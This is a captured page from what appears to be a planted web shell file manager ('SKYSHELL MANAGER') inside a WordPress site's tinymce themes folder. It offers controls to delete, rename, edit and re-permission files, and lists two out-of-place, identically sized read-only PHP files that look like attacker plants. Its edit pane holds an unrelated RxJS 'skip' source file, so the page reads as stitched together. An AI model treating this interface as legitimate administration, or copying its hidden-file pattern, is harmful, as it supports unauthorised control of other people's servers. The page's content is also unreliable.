📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: skip.ts
import { MonoTypeOperatorFunction } from '../types'; import { filter } from './filter'; /** * Returns an Observable that skips the first `count` items emitted by the source Observable. * *  * * Skips the values until the sent notifications are equal or less than provided skip count. It raises * an error if skip count is equal or more than the actual number of emits and source raises an error. * * ## Example * * Skip the values before the emission * * ```ts * import { interval, skip } from 'rxjs'; * * // emit every half second * const source = interval(500); * // skip the first 10 emitted values * const result = source.pipe(skip(10)); * * result.subscribe(value => console.log(value)); * // output: 10...11...12...13... * ``` * * @see {@link last} * @see {@link skipWhile} * @see {@link skipUntil} * @see {@link skipLast} * * @param {Number} count - The number of times, items emitted by source Observable should be skipped. * @return A function that returns an Observable that skips the first `count` * values emitted by the source Observable. */ export function skip<T>(count: number): MonoTypeOperatorFunction<T> { return filter((_, index) => count <= index); }
Save